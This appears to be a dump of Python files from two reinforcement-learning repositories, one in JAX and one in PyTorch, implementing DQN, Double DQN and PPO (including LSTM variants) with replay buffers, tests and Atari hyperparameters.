random_state.randint(-sys.maxsize - 1, sys.maxsize + 1, dtype=np.int64)
)
def environment_builder():
"""Environment creation function """
return gym.make(FLAGS.environment_name)
env = environment_builder()
logging.info('Environment: %s', FLAGS.environment_name)
logging.info('Action spec: %s', env.action_space)
logging.info('Observation spec: %s', env.observation_space)
assert isinstance(env.action_space, gym.spaces.Discrete)
assert isinstance(env.observation_space, gym.spaces.Box)
assert len(env.observation_space.shape) == 1
num_actions = env.action_space.n
def network_fn(inputs):
mlp = hk.nets.MLP([*FLAGS.hidden_size, num_actions])
return mlp(inputs)
network = hk.transform(network_fn)
sample_network_input = env.reset()
decay_steps = int(
FLAGS.exploration_epsilon_decay_frame_fraction
* FLAGS.num_iterations
* FLAGS.num_train_frames
)
exploration_epsilon_schedule = parts.LinearSchedule(
begin_value=FLAGS.exploration_epsilon_begin_value,
end_value=FLAGS.exploration_epsilon_end_value,
begin_t=int(FLAGS.min_replay_capacity_fraction*FLAGS.replay_capacity),
decay_steps=decay_steps
)
replay_structure = parts.Transition(
s_tm1=None, a_tm1=None, r_t=None, discount_t=None, s_t=None
)
replay = replay_lib.TransitionReplay(
FLAGS.replay_capacity,
replay_structure,
random_state
)
optimizer = optax.adam(FLAGS.learning_rate)
train_rng_key, eval_rng_key = jax.random.split(rng_key)
train_agent = agent.DQN(
sample_network_input=sample_network_input,
network=network,
optimizer=optimizer,
transition_accumulator=replay_lib.TransitionAccumulator(),
replay=replay,
batch_size=FLAGS.batch_size,
exploration_epsilon=exploration_epsilon_schedule,
min_replay_capacity_fraction=FLAGS.min_replay_capacity_fraction,
learn_period=FLAGS.learn_period,
target_network_update_period=FLAGS.target_network_update_period,
grad_error_bound=FLAGS.grad_error_bound,
rng_key=train_rng_key
)
iteration = 0
env = environment_builder()
while iteration <= FLAGS.num_iterations:
logging.info('Training iteration %d', iteration)
train_seq = parts.run_loop(
train_agent, env, FLAGS.max_frames_per_episode
)
train_seq_truncated = itertools.islice(
train_seq, FLAGS.num_train_frames
)
train_trackers = parts.make_default_trackers(train_agent)
train_stats = parts.generate_statistics(
train_trackers, train_seq_truncated
)
log_output = [
('iteration', iteration, '%3d'),
('frame', iteration * FLAGS.num_train_frames, '%5d'),
('train_num_episodes', train_stats['num_episodes'], '%5d'),
('train_episode_return', train_stats['episode_return'], '%2.2f'),
('train_state_value', train_stats['state_value'], '%.3f'),
('train_loss_value', train_stats['loss_value'], '%.3f'),
('train_epsilon', train_agent.exploration_epsilon, '%2.2f')
]
log_output_str = ', '.join(
('%s: ' + f) % (n, v) for n, v, f in log_output
)
logging.info(log_output_str)
iteration += 1
if __name__ == "__main__":
config.update('jax_platform_name', 'gpu')
config.update('jax_numpy_rank_promotion', 'raise')
config.config_with_absl()
app.run(main)
```
#### File: rljaxff/po_ppo/network.py
```python
from typing import List, NamedTuple, Callable
import haiku as hk
import jax
import jax.numpy as jnp
import rljaxff.networks as net_lib
class PPONetworkOutputs(NamedTuple):
"""Output from PPO network """
pi_logits: jnp.ndarray
value: jnp.ndarray
class PPOLSTMNetwork(NamedTuple):
"""A convenience wrapper around Haiku transformations of PPO LSTM Network
Has 3 functions:
- apply(params, inputs, prev_state) -> PPONetworkOutput, (hk.LSTMState, ..)
this runs a forward pass of PPOLSTMNetwork
- init(rng_key, sample_input, sample_state) -> hk.Params
this returns the initial model parameters
- initial_state(batch_size) -> (hk.LSTMState, ..)
get the initial state of the network
"""
apply: Callable
init: Callable
initial_state: Callable
def ppo_lstm_network(lstm_sizes: List[int],
action_head_hidden_sizes: List[int],
value_head_hidden_sizes: List[int],
num_actions: int) -> net_lib.NetworkFn:
"""PPO LSTM """
def net_fn(inputs, prev_state):
lstm_layers = []
for size in lstm_sizes:
lstm_layers.append(hk.LSTM(size))
lstm_layers.append(jax.nn.relu)
lstm_core = hk.DeepRNN(lstm_layers)
inputs, next_state = lstm_core(inputs, prev_state)
# policy head
action_inputs = hk.nets.MLP(action_head_hidden_sizes)(inputs)
action_logits = net_lib.linear(num_actions)(action_inputs)
# value head
value_inputs = hk.nets.MLP(value_head_hidden_sizes)(inputs)
value = net_lib.linear(1)(value_inputs)
output = PPONetworkOutputs(pi_logits=action_logits, value=value)
return output, next_state
return net_fn
def ppo_lstm_init_state(lstm_sizes: List[int]):
"""Function for getting the LSTM state for the PPO LSTM network """
def initial_state_fn(batch_size):
lstm_layers = []
for size in lstm_sizes:
lstm_layers.append(hk.LSTM(size))
lstm_layers.append(jax.nn.relu)
lstm_core = hk.DeepRNN(lstm_layers)
# don't need to worry about the action and value heads since they
# contribute nothing to the LSTMState
return lstm_core.initial_state(batch_size)
return initial_state_fn
def make_ppo_lstm_network(lstm_sizes: List[int],
action_head_hidden_sizes: List[int],
value_head_hidden_sizes: List[int],
num_actions: int) -> PPOLSTMNetwork:
"""Get the hk.Transformed PPO LSTM Network """
net_fn = ppo_lstm_network(
lstm_sizes,
action_head_hidden_sizes,
value_head_hidden_sizes,
num_actions
)
net_init, net_apply = hk.without_apply_rng(hk.transform(net_fn))
init_state_fn = ppo_lstm_init_state(lstm_sizes)
_, initial_state_apply = hk.without_apply_rng(hk.transform(init_state_fn))
def initial_state(batch_size):
# convinience function which handles passing in the network params
# argument, which can be None since it's not used in the function
h = initial_state_apply(None, batch_size)
return h
return PPOLSTMNetwork(
apply=net_apply,
init=net_init,
initial_state=initial_state
)
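# Usage sketch (the layer sizes and observation shape are assumptions):
#   net = make_ppo_lstm_network([64], [32], [32], num_actions=4)
#   state = net.initial_state(batch_size=1)
#   params = net.init(jax.random.PRNGKey(0), jnp.zeros((1, 8)), state)
#   out, next_state = net.apply(params, jnp.zeros((1, 8)), state)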
```
#### File: rljaxff/ppo/functions.py
```python
import jax.numpy as jnp
def clipped_ppo_policy_loss(predicted_log_pi: jnp.ndarray,
sampled_log_pi: jnp.ndarray,
advantage: jnp.ndarray,
clip_range: float) -> jnp.ndarray:
"""Clipped PPO policy loss """
ratio = jnp.exp(predicted_log_pi - sampled_log_pi)
clipped_ratio = jnp.clip(ratio, 1-clip_range, 1+clip_range)
losses = jnp.minimum(ratio * advantage, clipped_ratio * advantage)
return -jnp.mean(losses)
def clipped_ppo_value_fn_loss(predicted_value: jnp.ndarray,
sampled_value: jnp.ndarray,
sampled_return: jnp.ndarray,
clip_range: float) -> jnp.ndarray:
"""Clipped PPO value function loss """
# clip the value function so that change in value is within clip distance
# of value estimate from current value fn
clipped_value = sampled_value + jnp.clip(
predicted_value - sampled_value, -clip_range, clip_range
)
return 0.5 * jnp.mean((clipped_value - sampled_return)**2)
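# Minimal usage sketch (the numbers are illustrative only):
#   logp_new = jnp.log(jnp.array([0.5, 0.4]))
#   logp_old = jnp.log(jnp.array([0.6, 0.3]))
#   adv = jnp.array([1.0, -0.5])
#   clipped_ppo_policy_loss(logp_new, logp_old, adv, clip_range=0.2)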
```
#### File: rljaxforfun/rljaxff/replay_test.py
```python
import collections
import chex
import numpy as np
from absl.testing import absltest
from rljaxff import parts
from rljaxff import replay as replay_lib
Pair = collections.namedtuple("Pair", ['a', 'b'])
class TransitionReplayTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.capacity = 10
self.replay = replay_lib.TransitionReplay(
capacity=self.capacity,
structure=Pair(a=None, b=None),
random_state=np.random.RandomState(1)
)
self.items = [
Pair(a=1, b=2),
Pair(a=11, b=22),
Pair(a=111, b=222),
Pair(a=1111, b=2222),
]
for item in self.items:
self.replay.add(item)
def test_size(self):
self.assertLen(self.items, self.replay.size)
def test_capacity(self):
self.assertEqual(self.capacity, self.replay.capacity)
def test_sample(self):
num_samples = 2
samples = self.replay.sample(num_samples)
chex.assert_shape(samples.a, (num_samples, ))
def test_sample2(self):
num_samples = 2
samples = self.replay.sample(num_samples)
valid_a_values = [p.a for p in self.items]
valid_b_values = [p.b for p in self.items]
valid_a = [a for a in samples.a if a in valid_a_values]
valid_b = [b for b in samples.b if b in valid_b_values]
self.assertEqual(num_samples, len(valid_a))
self.assertEqual(num_samples, len(valid_b))
class TransitionAccumulatorTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.transition_accumulator = replay_lib.TransitionAccumulator()
self.num_timesteps = 10
self.observation_dims = (10, 5)
self.discount = 0.99
self.timesteps = []
self.actions = []
for i in range(self.num_timesteps):
if i == 0:
step_type = parts.StepType.FIRST
elif i == self.num_timesteps - 1:
step_type = parts.StepType.LAST
else:
step_type = parts.StepType.MID
timestep = parts.Timestep(
step_type=step_type,
reward=parts.Reward(i),
discount=self.discount,
observation=np.array([i])
)
self.timesteps.append(timestep)
self.actions.append(parts.Action(i))
def test_reset(self):
self.transition_accumulator.reset()
self.assertEqual(self.transition_accumulator._timestep_tm1, None)
self.assertEqual(self.transition_accumulator._a_tm1, None)
def test_first_step(self):
transitions = self.transition_accumulator.step(
self.timesteps[0], self.actions[0]
)
self.assertEqual([], list(transitions))
def test_mid(self):
n = self.num_timesteps // 2
for i in range(n + 1):
transitions = list(self.transition_accumulator.step(
self.timesteps[i], self.actions[i]
))
transition = transitions[0]
t_t = self.timesteps[n]
t_tm1 = self.timesteps[n-1]
a_tm1 = self.actions[n-1]
self.assertEqual(t_tm1.observation, transition.s_tm1)
self.assertEqual(a_tm1, transition.a_tm1)
self.assertEqual(t_t.reward, transition.r_t)
self.assertEqual(t_t.discount, transition.discount_t)
self.assertEqual(t_t.observation, transition.s_t)
if __name__ == "__main__":
absltest.main()
``` |
{
"source": "Jjschwartz/rltorch",
"score": 2
} |
#### File: policy_gradients/PPOLSTM/agent.py
```python
import gym
import time
import numpy as np
from pprint import pprint
import torch
import torch.nn as nn
import torch.optim as optim
from .buffer import PPOBuffer
from .model import PPOLSTMActorCritic
from rltorch.utils.rl_logger import RLLogger
class PPOLSTMAgent:
def __init__(self, **kwargs):
print("\nPPO with config:")
pprint(kwargs)
self.seed = kwargs["seed"]
torch.manual_seed(self.seed)
np.random.seed(self.seed)
self.env_name = kwargs["env_name"]
self.env = gym.make(self.env_name)
self.num_actions = self.env.action_space.n
self.obs_dim = self.env.observation_space.shape
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Using device={self.device}")
self.logger = RLLogger(self.env_name, "ppolstm")
self.setup_logger()
# Hyper params
self.steps_per_epoch = kwargs["epoch_steps"]
self.epochs = kwargs["epochs"]
self.max_ep_len = kwargs["max_ep_len"]
self.clip_ratio = kwargs["clip_ratio"]
self.target_kl = kwargs["target_kl"]
self.train_actor_iters = kwargs["train_actor_iters"]
self.train_critic_iters = kwargs["train_critic_iters"]
self.model_save_freq = kwargs["model_save_freq"]
self.buffer = PPOBuffer(self.steps_per_epoch, self.obs_dim, kwargs["hidden_size"],
kwargs["gamma"], kwargs["lam"], self.device)
self.actor_critic = PPOLSTMActorCritic(self.obs_dim[0], kwargs["hidden_size"], self.num_actions)
self.actor_critic.to(self.device)
print("\nActorCritic:")
print(self.actor_critic)
self.actor_optimizer = optim.Adam(self.actor_critic.actor.parameters(), lr=kwargs["actor_lr"])
self.critic_optimizer = optim.Adam(self.actor_critic.critic.parameters(), lr=kwargs["critic_lr"])
self.critic_loss_fn = nn.MSELoss()
def setup_logger(self):
# adds headers of interest
self.logger.add_header("epoch")
self.logger.add_header("total_steps")
self.logger.add_header("avg_ep_return")
self.logger.add_header("min_ep_return")
self.logger.add_header("max_ep_return")
self.logger.add_header("avg_vals")
self.logger.add_header("min_vals")
self.logger.add_header("max_vals")
self.logger.add_header("avg_ep_len")
self.logger.add_header("actor_loss")
self.logger.add_header("actor_loss_delta")
self.logger.add_header("critic_loss")
self.logger.add_header("critic_loss_delta")
self.logger.add_header("kl")
self.logger.add_header("entropy")
self.logger.add_header("time")
def get_action(self, obs, hid):
return self.actor_critic.act(obs, hid)
def compute_actor_loss(self, data):
obs, act, adv, logp_old = data["obs"], data["act"], data["adv"], data["logp"]
hid = data["actor_hid"]
pi, logp, _ = self.actor_critic.actor.step(obs, act, hid)
logp = logp.squeeze()
ratio = torch.exp(logp - logp_old)
clipped_ratio = torch.clamp(ratio, 1-self.clip_ratio, 1+self.clip_ratio)
clip_adv = clipped_ratio * adv
actor_loss = -(torch.min(ratio * adv, clip_adv)).mean()
actor_loss_info = dict()
actor_loss_info["kl"] = (logp_old - logp).mean().item()
actor_loss_info["entropy"] = pi.entropy().mean().item()
return actor_loss, actor_loss_info
def compute_critic_loss(self, data):
obs, ret, hid = data["obs"], data["ret"], data["critic_hid"]
predicted_val, _ = self.actor_critic.critic.forward(obs, hid)
predicted_val = predicted_val.squeeze()
return self.critic_loss_fn(predicted_val, ret)
def optimize(self):
data = self.buffer.get()
actor_loss_start, actor_loss_info_start = self.compute_actor_loss(data)
actor_loss_start = actor_loss_start.item()
critic_loss_start = self.compute_critic_loss(data).item()
for i in range(self.train_actor_iters):
self.actor_optimizer.zero_grad()
actor_loss, actor_loss_info = self.compute_actor_loss(data)
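            # Early stopping: once the approximate KL between the old and new
            # policies exceeds 1.5x the target, skip the remaining policy
            # updates for this epoch (a common PPO heuristic)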
if actor_loss_info["kl"] > 1.5*self.target_kl:
break
actor_loss.backward()
self.actor_optimizer.step()
for i in range(self.train_critic_iters):
self.critic_optimizer.zero_grad()
critic_loss = self.compute_critic_loss(data)
critic_loss.backward()
self.critic_optimizer.step()
# calculate changes in loss, for logging
actor_loss_delta = (actor_loss.item() - actor_loss_start)
critic_loss_delta = (critic_loss.item() - critic_loss_start)
self.logger.log("actor_loss", actor_loss_start)
self.logger.log("actor_loss_delta", actor_loss_delta)
self.logger.log("critic_loss", critic_loss_start)
self.logger.log("critic_loss_delta", critic_loss_delta)
self.logger.log("kl", actor_loss_info_start["kl"])
self.logger.log("entropy", actor_loss_info_start["entropy"])
def step(self, obs, actor_hid, critic_hid):
return self.actor_critic.step(self.process_single_obs(obs), actor_hid, critic_hid)
def get_value(self, obs, critic_hid):
return self.actor_critic.get_value(self.process_single_obs(obs), critic_hid)
def process_single_obs(self, obs):
proc_obs = torch.from_numpy(obs).float().to(self.device)
proc_obs = proc_obs.view(1, 1, -1)
return proc_obs
def train(self):
print("PPO Starting training")
start_time = time.time()
for epoch in range(self.epochs):
self.logger.log("epoch", epoch)
o = self.env.reset()
epoch_ep_rets = []
epoch_ep_lens = []
ep_ret, ep_len = 0, 0
epoch_vals = []
actor_hid, critic_hid = self.actor_critic.get_init_hidden()
for t in range(self.steps_per_epoch):
a, v, logp, next_actor_hid, next_critic_hid = self.step(o, actor_hid, critic_hid)
next_o, r, d, _ = self.env.step(a.squeeze())
ep_len += 1
ep_ret += r
epoch_vals.append(v)
self.buffer.store(o, a, r, v, logp, actor_hid, critic_hid)
o = next_o
actor_hid = next_actor_hid
critic_hid = next_critic_hid
timeout = ep_len == self.max_ep_len
terminal = timeout or d
epoch_ended = t == self.steps_per_epoch-1
if terminal or epoch_ended:
v = 0
if timeout or epoch_ended:
v, next_critic_hid = self.get_value(o, critic_hid)
self.buffer.finish_path(v)
if terminal:
epoch_ep_rets.append(ep_ret)
epoch_ep_lens.append(ep_len)
ep_ret, ep_len = 0, 0
o = self.env.reset()
actor_hid, critic_hid = self.actor_critic.get_init_hidden()
# update the model
self.optimize()
# save model
if (epoch+1) % self.model_save_freq == 0:
print(f"Epoch {epoch+1}: saving model")
save_path = self.logger.get_save_path("pth")
self.actor_critic.save_AC(save_path)
self.logger.log("total_steps", (epoch+1)*self.steps_per_epoch)
self.logger.log("avg_ep_return", np.mean(epoch_ep_rets))
self.logger.log("min_ep_return", np.min(epoch_ep_rets))
self.logger.log("max_ep_return", np.max(epoch_ep_rets))
self.logger.log("avg_vals", np.mean(epoch_vals))
self.logger.log("min_vals", np.min(epoch_vals))
self.logger.log("max_vals", np.max(epoch_vals))
self.logger.log("avg_ep_len", np.mean(epoch_ep_lens))
self.logger.log("time", time.time()-start_time)
self.logger.flush(display=True)
print("PPO Training complete")
```
#### File: policy_gradients/PPOLSTM/model.py
```python
import torch
import torch.nn as nn
from torch.distributions.categorical import Categorical
class PPOLSTMActor(nn.Module):
def __init__(self, input_dim, hidden_size, num_actions, output_activation):
super().__init__()
self.hidden_size = hidden_size
self.lstm = nn.LSTM(input_dim, hidden_size)
self.out = nn.Linear(hidden_size, num_actions)
self.output_activation = output_activation()
def get_init_hidden(self, batch_size=1):
return (torch.randn(1, batch_size, self.hidden_size),
torch.randn(1, batch_size, self.hidden_size))
def forward(self, x, hidden):
x, hidden = self.lstm(x, hidden)
x = self.output_activation(self.out(x))
return x, hidden
def get_pi(self, x, hidden):
x, hidden = self.forward(x, hidden)
return Categorical(logits=x), hidden
def get_logp(self, pi, act):
log_p = pi.log_prob(act)
return log_p
def step(self, obs, act, hidden):
pi, hidden = self.get_pi(obs, hidden)
logp_a = self.get_logp(pi, act)
return pi, logp_a, hidden
class PPOLSTMCritic(nn.Module):
def __init__(self, input_dim, hidden_size, output_activation):
super().__init__()
self.hidden_size = hidden_size
self.lstm = nn.LSTM(input_dim, hidden_size)
self.out = nn.Linear(hidden_size, 1)
self.output_activation = output_activation()
def get_init_hidden(self, batch_size=1):
return (torch.randn(1, batch_size, self.hidden_size),
torch.randn(1, batch_size, self.hidden_size))
def forward(self, x, hidden):
x, hidden = self.lstm(x, hidden)
x = self.output_activation(self.out(x))
# removes last dimension
return torch.squeeze(x, -1), hidden
class PPOLSTMActorCritic(nn.Module):
def __init__(self, obs_dim, hidden_size, num_actions, output_activation=nn.Identity):
super().__init__()
self.actor = PPOLSTMActor(obs_dim, hidden_size, num_actions, output_activation)
self.critic = PPOLSTMCritic(obs_dim, hidden_size, output_activation)
def get_init_hidden(self):
return self.actor.get_init_hidden(), self.critic.get_init_hidden()
def step(self, obs, hidden_actor, hidden_critic):
with torch.no_grad():
pi, new_hidden_actor = self.actor.get_pi(obs, hidden_actor)
a = pi.sample()
logp_a = self.actor.get_logp(pi, a)
v, new_hidden_critic = self.critic(obs, hidden_critic)
return a.numpy(), v.numpy(), logp_a.numpy(), new_hidden_actor, new_hidden_critic
def act(self, obs, hidden):
with torch.no_grad():
obs = obs.view(1, 1, -1)
pi, new_hidden = self.actor.get_pi(obs, hidden)
a = pi.sample()
return a.numpy(), (new_hidden[0].numpy(), new_hidden[1].numpy())
def get_value(self, obs, hidden):
with torch.no_grad():
v, new_hidden = self.critic(obs, hidden)
return v.numpy(), (new_hidden[0].numpy(), new_hidden[1].numpy())
def save_AC(self, file_path):
torch.save(self.state_dict(), file_path)
    def load_AC(self, file_path):
        self.load_state_dict(torch.load(file_path))
```
#### File: policy_gradients/PPO/model.py
```python
import torch
import torch.nn as nn
from torch.distributions.categorical import Categorical
class PPOActor(nn.Module):
def __init__(self, input_dim, hidden_sizes, num_actions, activation, output_activation):
super().__init__()
layers = [nn.Linear(input_dim[0], hidden_sizes[0]), activation()]
for l in range(1, len(hidden_sizes)):
layers.append(nn.Linear(hidden_sizes[l-1], hidden_sizes[l]))
layers.append(activation())
layers.append(nn.Linear(hidden_sizes[-1], num_actions))
layers.append(output_activation())
self.net = nn.Sequential(*layers)
def forward(self, x, act=None):
pi = self.get_pi(x)
logp_a = None
if act is not None:
logp_a = self.get_logp(pi, act)
return pi, logp_a
def get_pi(self, obs):
return Categorical(logits=self.net(obs))
def get_logp(self, pi, act):
log_p = pi.log_prob(act)
return log_p
def step(self, obs, act):
"""
Returns
-------
pi : a distribution over actions
logp_a : log likelihood of given action 'act' under pi
"""
pi = self.get_pi(obs)
logp_a = self.get_logp(pi, act)
return pi, logp_a
class PPOCritic(nn.Module):
def __init__(self, input_dim, hidden_sizes, activation, output_activation):
super().__init__()
layers = [nn.Linear(input_dim[0], hidden_sizes[0]), activation()]
for l in range(1, len(hidden_sizes)):
layers.append(nn.Linear(hidden_sizes[l-1], hidden_sizes[l]))
layers.append(activation())
layers.append(nn.Linear(hidden_sizes[-1], 1))
layers.append(output_activation())
self.net = nn.Sequential(*layers)
def forward(self, x):
# removes last dimension
return torch.squeeze(self.net(x), -1)
class PPOActorCritic(nn.Module):
def __init__(self, obs_dim, hidden_sizes, num_actions,
activation=nn.Tanh, output_activation=nn.Identity):
super().__init__()
self.actor = PPOActor(obs_dim, hidden_sizes, num_actions, activation, output_activation)
self.critic = PPOCritic(obs_dim, hidden_sizes, activation, output_activation)
def step(self, obs):
with torch.no_grad():
pi = self.actor.get_pi(obs)
a = pi.sample()
logp_a = self.actor.get_logp(pi, a)
v = self.critic(obs)
return a.numpy(), v.numpy(), logp_a.numpy()
def act(self, obs):
with torch.no_grad():
            return self.actor.get_pi(obs).sample().numpy()
def get_value(self, obs):
with torch.no_grad():
return self.critic(obs).numpy()
def save_AC(self, file_path):
torch.save(self.state_dict(), file_path)
def load_AC(self, file_path):
        self.load_state_dict(torch.load(file_path))
```
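For comparison, a usage sketch of the feed-forward version (CartPole-like dimensions assumed for illustration); note that `obs_dim` is a shape tuple here, since the networks index it as `input_dim[0]`:

```python
import torch

ac = PPOActorCritic(obs_dim=(4,), hidden_sizes=[64, 64], num_actions=2)
obs = torch.zeros(4)                               # a single observation
a, v, logp_a = ac.step(obs)                        # numpy action, value, log-prob
pi, logp = ac.actor.step(obs, torch.as_tensor(a))  # re-evaluate for the PPO ratio
```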
#### File: q_learning/DQN/agent.py
```python
import torch
import torch.nn as nn
import torch.optim as optim
from .model import DQN
from rltorch.algs.q_learning.base.replay import ReplayMemory
from rltorch.algs.q_learning.base.agent import QLearningBaseAgent
class DQNAgent(QLearningBaseAgent):
"""The vanilla DQN Agent (with no target network) """
def __init__(self, name="DQN", **kwargs):
super().__init__(name, **kwargs)
if self.seed:
torch.manual_seed(self.seed)
# Neural Network related attributes
self.device = torch.device("cuda"
if torch.cuda.is_available()
else "cpu")
print(f"Using device={self.device}")
self.network_update_freq = kwargs["network_update_freq"]
self.dqn = DQN(self.obs_dim,
kwargs["hidden_sizes"],
self.num_actions).to(self.device)
print(self.dqn)
self.optimizer = optim.Adam(self.dqn.parameters(), lr=self.lr)
print(self.optimizer)
self.loss_fn = nn.SmoothL1Loss()
# replay
self.replay = ReplayMemory(kwargs["replay_size"],
self.obs_dim,
self.device)
self.updates_done = 0
def get_action(self, o):
o = torch.from_numpy(o).float().to(self.device)
return self.dqn.get_action(o).cpu().item()
def optimize(self):
if self.steps_done % self.network_update_freq != 0:
return None
if self.steps_done < self.start_steps:
return 0, 0, 0, 0
batch = self.replay.sample_batch(self.batch_size)
s_batch, a_batch, next_s_batch, r_batch, d_batch = batch
# get q_vals for each state and the action performed in that state
q_vals_raw = self.dqn(s_batch)
q_vals = q_vals_raw.gather(1, a_batch).squeeze()
# get target q val = max val of next state
with torch.no_grad():
target_q_val_raw = self.dqn(next_s_batch)
target_q_val, _ = target_q_val_raw.max(1)
target = r_batch + self.discount*(1-d_batch)*target_q_val
# calculate loss
loss = self.loss_fn(q_vals, target)
# optimize the model
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.updates_done += 1
q_vals_max = q_vals_raw.max(1)[0]
mean_v = q_vals_max.mean().item()
max_v = q_vals.max().item()
mean_td_error = (target - q_vals).abs().mean().item()
return loss.item(), mean_v, max_v, mean_td_error
def save_model(self):
save_path = self.logger.get_save_path(ext=".pth")
self.dqn.save_DQN(save_path)
def store(self, o, a, next_o, r, d):
self.replay.store(o, a, next_o, r, d)
```
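The update above regresses Q(s, a) onto the one-step TD target r + γ(1 - d)·max_a' Q(s', a'). A self-contained sketch of that tensor arithmetic on dummy data (shapes and values assumed for illustration):

```python
import torch

batch, num_actions, discount = 3, 2, 0.99
q_vals_raw = torch.randn(batch, num_actions)      # stands in for dqn(s_batch)
a_batch = torch.tensor([[0], [1], [0]])           # actions taken, shape (batch, 1)
r_batch = torch.ones(batch)
d_batch = torch.tensor([0.0, 0.0, 1.0])           # done flags cut the bootstrap

q_vals = q_vals_raw.gather(1, a_batch).squeeze()  # Q(s, a) per transition
with torch.no_grad():
    next_q = torch.randn(batch, num_actions)      # stands in for dqn(next_s_batch)
    target = r_batch + discount * (1 - d_batch) * next_q.max(1)[0]
td_error = (target - q_vals).abs()
```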
#### File: papers/DQN/ddqn_agent.py
```python
import torch
from .dqn_agent import DQNAgent
from rltorch.papers.DQN.hyperparams import AtariHyperparams as hp
class DDQNAgent(DQNAgent):
def optimize(self):
if self.steps_done % hp.NETWORK_UPDATE_FREQUENCY != 0:
return None
if self.steps_done < hp.REPLAY_START_SIZE:
return 0, 0, 0, 0
batch = self.replay.sample_batch(hp.MINIBATCH_SIZE)
s_batch, a_batch, next_s_batch, r_batch, d_batch = batch
q_vals_raw = self.dqn(s_batch)
q_vals = q_vals_raw.gather(1, a_batch).squeeze()
with torch.no_grad():
next_s_q_vals = self.dqn(next_s_batch)
max_a_next_s = next_s_q_vals.max(1)[1].unsqueeze(1)
target_q_val_raw = self.target_dqn(next_s_batch)
target_q_vals = target_q_val_raw.gather(1, max_a_next_s).squeeze()
target = r_batch + (1-d_batch)*hp.DISCOUNT*target_q_vals
        loss = self.loss_fn(q_vals, target)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.updates_done += 1
if self.updates_done % hp.TARGET_NETWORK_UPDATE_FREQ == 0:
self.update_target_net()
mean_v = q_vals_raw.max(1)[0].mean().item()
max_v = q_vals.max().item()
mean_td_error = (target - q_vals).abs().mean().item()
return loss.item(), mean_v, max_v, mean_td_error
```
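The only change from the base agent is the target: Double DQN selects the next action with the online network but evaluates it with the target network, target = r + γ(1 - d)·Q_target(s', argmax_a Q_online(s', a)), which damps the overestimation of a plain max. A sketch of just that decoupling on dummy tensors (shapes assumed for illustration):

```python
import torch

batch, num_actions, discount = 3, 2, 0.99
next_q_online = torch.randn(batch, num_actions)  # stands in for dqn(next_s_batch)
next_q_target = torch.randn(batch, num_actions)  # stands in for target_dqn(next_s_batch)
r_batch, d_batch = torch.ones(batch), torch.zeros(batch)

best_a = next_q_online.max(1)[1].unsqueeze(1)            # select with the online net
evaluated = next_q_target.gather(1, best_a).squeeze()    # evaluate with the target net
target = r_batch + (1 - d_batch) * discount * evaluated
```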
#### File: papers/DQN/hyperparams.py
```python
import numpy as np
import torch.optim as optim
from .model import DQN, DuelingDQN
class AtariHyperparams:
ALGO = "DQN"
SEED = 2
LOG_DISPLAY_FREQ = 10
# Image sizing
WIDTH = 84
HEIGHT = 84
# Number of most recent frames given as input to Q-network
AGENT_HISTORY = 4
STATE_DIMS = (AGENT_HISTORY, WIDTH, HEIGHT)
NORMALIZE = False
DISCOUNT = 0.99
MINIBATCH_SIZE = 32
REPLAY_SIZE = int(1e6)
REPLAY_S_DTYPE = np.uint8
# Number of network updates between target network updates
# TARGET_NETWORK_UPDATE_FREQ = 10000
TARGET_NETWORK_UPDATE_FREQ = 2500 # every 10000 frames
# Number of times an action is repeated, i.e. number of frames skipped
ACTION_REPEAT = 4
# Num actions (ignoring repeats) performed before Gradient descent update
NETWORK_UPDATE_FREQUENCY = 4
# Parameters for network learning
OPTIMIZER = optim.RMSprop
LEARNING_RATE = 0.00025
GRADIENT_MOMENTUM = 0.95
SQUARED_GRADIENT_MOMENTUM = 0.95
MIN_SQUARED_GRADIENT = 0.01
OPTIMIZER_KWARGS = {
"lr": LEARNING_RATE,
"momentum": GRADIENT_MOMENTUM,
"eps": MIN_SQUARED_GRADIENT
}
GRAD_CLIP = [-1, 1]
# for reward
R_CLIP = [-1, 1]
# Exploration
EXPLORATION_SCHEDULE = "Linear"
INITIAL_EXPLORATION = 1.0
FINAL_EXPLORATION = 0.1
FINAL_EXPLORATION_FRAME = 1000000
# Number of frames to run random policy and before learning starts
REPLAY_START_SIZE = 50000
# Max number of "do nothing" actions to be performed at start of episode
NO_OP_MAX = 30
# Network architecture
INPUT_DIMS = (WIDTH, HEIGHT, AGENT_HISTORY)
LAYER_1 = {"type": "convolutional",
"filters": 32, "kernel_size": (8, 8),
"stride": 4, "activation": "relu"}
LAYER_2 = {"type": "convolutional",
"filters": 64, "kernel_size": (4, 4),
"stride": 2, "activation": "relu"}
LAYER_3 = {"type": "convolutional",
"filters": 64, "kernel_size": (3, 3),
"stride": 1, "activation": "relu"}
LAYER_4 = {"type": "fully_connected",
"size": 512, "activation": "relu"}
OUTPUT = {"type": "fully_connected"}
MODEL = DQN
# training duration (50 million)
TRAINING_FRAMES = int(5e7)
# Other hyperparams not related to paper
# Model Save Freq
MODEL_SAVE_FREQ = int(1e6)
# Evaluation
EVAL_FREQ = int(1e6)
EVAL_STEPS = 125000
EVAL_EPSILON = 0.05
@classmethod
def set_seed(cls, seed):
cls.SEED = seed
@classmethod
def set_mode(cls, mode='dqn'):
if mode == "testing":
print("WARNING: using test hyperparams")
input("Press any key to continue..")
cls.ALGO += "_test"
cls.REPLAY_SIZE = int(1e4)
cls.REPLAY_START_SIZE = 100
cls.INITIAL_EXPLORATION = 0.1
cls.TARGET_NETWORK_UPDATE_FREQ = 1000
cls.EVAL_FREQ = 2000
cls.EVAL_STEPS = 1000
cls.MODEL_SAVE_FREQ = 2500
cls.LOG_DISPLAY_FREQ = 1
cls.MINIBATCH_SIZE = 12
elif mode == "eval":
cls.ALGO += "_eval"
cls.REPLAY_SIZE = int(1e4)
elif mode == "ddqn":
print("Using DDQN hyperparams")
cls.ALGO = "DDQN"
elif mode == "ddqn-tuned":
print("Using DDQN-Tuned hyperparams")
cls.ALGO = "DDQN-Tuned"
cls.TARGET_NETWORK_UPDATE_FREQ = 30000
cls.FINAL_EXPLORATION = 0.01
cls.EVAL_EPSILON = 0.001
elif mode == "dqn":
print("Using DQN hyperparams")
pass
elif mode == "duelingdqn":
print("Using Dueling DQN hyperparams")
cls.ALGO = "DuelingDQN"
cls.MODEL = DuelingDQN
elif mode == "normalized":
print("Using normalized observations")
cls.NORMALIZE = True
cls.REPLAY_S_DTYPE = np.float16
elif mode == "pong_tuned":
print("Using pong tuned hyperparams")
